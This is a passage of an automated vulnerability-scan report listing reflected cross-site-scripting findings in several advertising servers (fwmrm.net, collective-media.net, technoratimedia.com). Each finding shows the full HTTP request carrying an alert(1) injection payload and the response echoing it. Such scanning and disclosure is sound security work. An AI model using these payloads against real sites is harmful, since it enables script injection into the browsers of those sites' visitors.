Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317756298.0,20486.1317756298.0,20487.1317753554.0,20661.1317756142.0,^"; _pr="1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317756298.28800.0.4,sg143516.1317753552.1317756298.28800.0.0,"; _wr="g143516"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3e45525d5f4f58455e445a4a423209

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="b117_5659731851959818893";expires=Wed, 03 Oct 2012 20:11:17 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="g141659~1.1317753705.0,5.1317759053.0,20487.1317759053.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317759023.0,20486.1317756298.0,20487.1317759023.0,20661.1317756142.0,^";expires=Thu, 03 Nov 2011 20:11:17 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1317759077.438724.273825~,1317759069.649564.253944~254114~254701~254705~254706~327790~327796~,1317759029.649564a2e5761a53c8824f4df602c.253944~,1317759028.a2e5761a1295382b71812f2c.253944~,1317759000.438724a2e5761a42d46e2b97deeb32.273825~,1317758999.a2e5761ada6b8f92dade7133.273825~,1317758974.753420735476538500a2e5761ac7192e3688f5cc71.687378~,1317758973.a2e5761a679e207142393da2.687378~,1317758909.470567.295053~295054~,1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,";expires=Thu, 03 Nov 2011 20:11:17 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg127945.1317758965.1317759077.28800.0.0,sg141659.1317753567.1317759077.28800.0.4,sg143516.1317753552.1317759077.28800.0.0,";expires=Thu, 03 Nov 2011 20:11:17 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g143516";expires=Thu, 03 Nov 2011 20:11:17 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Content-Length: 10311
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:11:16 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ad
...[SNIP]...
,
{name:"_fw_creative_name", _:"FOX_20thCenturyFox_HP_300x250_RB_10/4 "
}]}
}]}
}]}
}]}
}]}
}],
"siteSection":[
{customId:"FOX_home", id:"72766cb280";alert(1)//c49b9d5dfef", pageViewRandom:"753420735476538500", _:{
"videoPlayer":[
{_:{
"videoAsset":[
{id:"-1", _:{
"adSlots":[
{_:null
}]}
}]}
}],
"adSlots":[
{
...[SNIP]...

1.9. http://1c6e2.v.fwmrm.net/ad/g/1 [vprn parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://1c6e2.v.fwmrm.net
Path:	/ad/g/1

Issue detail

The value of the vprn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b897"%3balert(1)//9d48bff7a00 was submitted in the vprn parameter. This input was echoed as 4b897";alert(1)//9d48bff7a00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=72766&ssnw=&csid=FOX_home&sfid=&cdid=&pvrn=753420735476538500&vprn=4b897"%3balert(1)//9d48bff7a00&vip=50.23.123.106&vdur=&flag=-unka&resp=smrx&crtp=ptiling&vclr=JS-pt-r3669;_fw_h_x_flash_version=10%2C3%2C183%2C0;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=mrec&envp=g_js&w=300&h=250&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317756298.0,20486.1317756298.0,20487.1317753554.0,20661.1317756142.0,^"; _pr="1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317756298.28800.0.4,sg143516.1317753552.1317756298.28800.0.0,"; _wr="g143516"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3e45525d5f4f58455e445a4a423209

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="b117_5659731851959818893";expires=Wed, 03 Oct 2012 20:12:16 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="g141659~1.1317753705.0,5.1317759064.0,20487.1317759064.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317759023.0,20486.1317756298.0,20487.1317759023.0,20661.1317756142.0,^";expires=Thu, 03 Nov 2011 20:12:16 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1317759136.753420735476538500.544603~664977~687378~,1317759135.438724.273825~,1317759133.753420735476538500]]>>.687378~,1317759132.753420735476538500".687378~,1317759131.753420735476538500
Set-Cookie: _sc="sg127945.1317758965.1317759136.28800.0.0,sg141659.1317753567.1317759136.28800.0.4,sg143516.1317753552.1317759136.28800.0.0,";expires=Thu, 03 Nov 2011 20:12:16 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g143516";expires=Thu, 03 Nov 2011 20:12:16 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Content-Length: 10330
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:12:15 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ad
...[SNIP]...
}]}
}]}
}],
"siteSection":[
{customId:"FOX_home", id:"72766", pageViewRandom:"753420735476538500", _:{
"videoPlayer":[
{_:{
"videoAsset":[
{id:"-1", videoPlayRandom:"4b897";alert(1)//9d48bff7a00", _:{
"adSlots":[
{_:null
}]}
}]}
}],
"adSlots":[
{_:{
"adSlot":[
{customId:"mrec", _:{
"selectedAds":[
{_:{
"adReferenc
...[SNIP]...

1.10. http://a.collective-media.net/adj/iblocal.3interactive.ron/n7061_728ros [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/iblocal.3interactive.ron/n7061_728ros

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6604e'-alert(1)-'f0a94848b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/iblocal.3interactive.ron6604e'-alert(1)-'f0a94848b6/n7061_728ros;kw=n7061_728ros;sz=728x90;ord=0.7794340003747493? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=8005/1752/1;s=638;d=14;w=728;h=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 498
Date: Tue, 04 Oct 2011 20:31:19 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Thu, 03-Nov-2011 20:31:19 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.3interactive.ron6604e'-alert(1)-'f0a94848b6/n7061_728ros;kw=n7061_728ros;sz=728x90;net=iblocal;ord=0.7794340003747493;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.11. http://a.collective-media.net/adj/iblocal.3interactive.ron/n7061_728ros [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/iblocal.3interactive.ron/n7061_728ros

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40e0a'-alert(1)-'c3c00823c89 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/iblocal.3interactive.ron/n7061_728ros40e0a'-alert(1)-'c3c00823c89;kw=n7061_728ros;sz=728x90;ord=0.7794340003747493? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=8005/1752/1;s=638;d=14;w=728;h=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 499
Date: Tue, 04 Oct 2011 20:31:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Thu, 03-Nov-2011 20:31:20 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros40e0a'-alert(1)-'c3c00823c89;kw=n7061_728ros;sz=728x90;net=iblocal;ord=0.7794340003747493;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.12. http://a.collective-media.net/adj/iblocal.3interactive.ron/n7061_728ros [kw parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/iblocal.3interactive.ron/n7061_728ros

Issue detail

The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5933'-alert(1)-'29310fe19c2 was submitted in the kw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/iblocal.3interactive.ron/n7061_728ros;kw=n7061_728ros;sz=728x90;ord=0.7794340003747493?a5933'-alert(1)-'29310fe19c2 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=8005/1752/1;s=638;d=14;w=728;h=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 500
Date: Tue, 04 Oct 2011 20:31:17 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3Ef21df86b6735b16d3c8e0c77; domain=collective-media.net; path=/; expires=Thu, 03-Nov-2011 20:31:17 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros;kw=n7061_728ros;sz=728x90;net=iblocal;ord=0.7794340003747493?a5933'-alert(1)-'29310fe19c2;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.13. http://a.collective-media.net/adj/iblocal.3interactive.ron/n7061_728ros [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/iblocal.3interactive.ron/n7061_728ros

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2802'-alert(1)-'301e4287ccb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/iblocal.3interactive.ron/n7061_728ros;kw=n7061_728ros;sz=728x90;ord=0.7794340003747493?&d2802'-alert(1)-'301e4287ccb=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=8005/1752/1;s=638;d=14;w=728;h=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 503
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:31:18 GMT
Connection: close
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Thu, 03-Nov-2011 20:31:18 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros;kw=n7061_728ros;sz=728x90;net=iblocal;ord=0.7794340003747493?&d2802'-alert(1)-'301e4287ccb=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.14. http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/iblocal.3interactive.ron/n7061_728ros

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce765'-alert(1)-'db9b9346edb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadjce765'-alert(1)-'db9b9346edb/iblocal.3interactive.ron/n7061_728ros;kw=n7061_728ros;sz=728x90;net=iblocal;ord=0.7794340003747493;env=ifr;ord1=431781;cmpgurl=http%253A//www.news.com.au/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=8005/1752/1;s=638;d=14;w=728;h=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:31:20 GMT
Content-Length: 7418
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='122f463e720f79d';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30509189363_1317760280","http://ad.doubleclick.net/adjce765'-alert(1)-'db9b9346edb/iblocal.3interactive.ron/n7061_728ros;net=iblocal;u=,iblocal-30509189363_1317760280,122f463e720f79d,polit,;;kw=n7061_728ros;sz=728x90;net=iblocal;env=ifr;ord1=431781;cmw=nowl;contx=polit;dc=s;btg=;ord
...[SNIP]...

1.15. http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/iblocal.3interactive.ron/n7061_728ros

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5a58'-alert(1)-'906117d89cf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/iblocal.3interactive.ronf5a58'-alert(1)-'906117d89cf/n7061_728ros;kw=n7061_728ros;sz=728x90;net=iblocal;ord=0.7794340003747493;env=ifr;ord1=431781;cmpgurl=http%253A//www.news.com.au/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=8005/1752/1;s=638;d=14;w=728;h=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7418
Date: Tue, 04 Oct 2011 20:31:20 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='122f463e720f79d';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30123908496_1317760280","http://ad.doubleclick.net/adj/iblocal.3interactive.ronf5a58'-alert(1)-'906117d89cf/n7061_728ros;net=iblocal;u=,iblocal-30123908496_1317760280,122f463e720f79d,polit,;;kw=n7061_728ros;sz=728x90;net=iblocal;env=ifr;ord1=431781;cmw=nowl;contx=polit;dc=s;btg=;ord=0.7794340003747493?","72
...[SNIP]...

1.16. http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/iblocal.3interactive.ron/n7061_728ros

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c1bc'-alert(1)-'28be1efec48 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/iblocal.3interactive.ron/n7061_728ros8c1bc'-alert(1)-'28be1efec48;kw=n7061_728ros;sz=728x90;net=iblocal;ord=0.7794340003747493;env=ifr;ord1=431781;cmpgurl=http%253A//www.news.com.au/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=8005/1752/1;s=638;d=14;w=728;h=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7418
Date: Tue, 04 Oct 2011 20:31:21 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='122f463e720f79d';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-30107475256_1317760281","http://ad.doubleclick.net/adj/iblocal.3interactive.ron/n7061_728ros8c1bc'-alert(1)-'28be1efec48;net=iblocal;u=,iblocal-30107475256_1317760281,122f463e720f79d,polit,;;kw=n7061_728ros;sz=728x90;net=iblocal;env=ifr;ord1=431781;cmw=nowl;contx=polit;dc=s;btg=;ord=0.7794340003747493?","728","90",true)
...[SNIP]...

1.17. http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros [kw parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/iblocal.3interactive.ron/n7061_728ros

Issue detail

The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ca2a'-alert(1)-'14d508e3d65 was submitted in the kw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/iblocal.3interactive.ron/n7061_728ros;kw=4ca2a'-alert(1)-'14d508e3d65 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=8005/1752/1;s=638;d=14;w=728;h=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:31:17 GMT
Content-Length: 7336
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='122f463e720f79d';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
iveMedia.createAndAttachAd("iblocal-30206994978_1317760277","http://ad.doubleclick.net/adj/iblocal.3interactive.ron/n7061_728ros;net=iblocal;u=,iblocal-30206994978_1317760277,122f463e720f79d,none,;;kw=4ca2a'-alert(1)-'14d508e3d65;cmw=nurl;contx=none;dc=s;btg=?","0","0",true);</scr'+'ipt>
...[SNIP]...

1.18. http://ad.technoratimedia.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.technoratimedia.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72afb"-alert(1)-"c9cbad768b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?pfm=1&tent=ch&tnws=ch&rtg=ga&brw=cr3&os=wn7&prm=0&efo=0&atf=0&uatRandNo=74877&ad_type=ad&section=1782249&ad_size=728x90&72afb"-alert(1)-"c9cbad768b4=1 HTTP/1.1
Host: ad.technoratimedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.carsguide.com.au/search/?N=4294962119&origin=browse&Nf=pYear|GTEQ%202008&type=cars
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 20:31:15 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 04 Oct 2011 20:31:15 GMT
Pragma: no-cache
Age: 0
Proxy-Connection: keep-alive
Content-Length: 4405

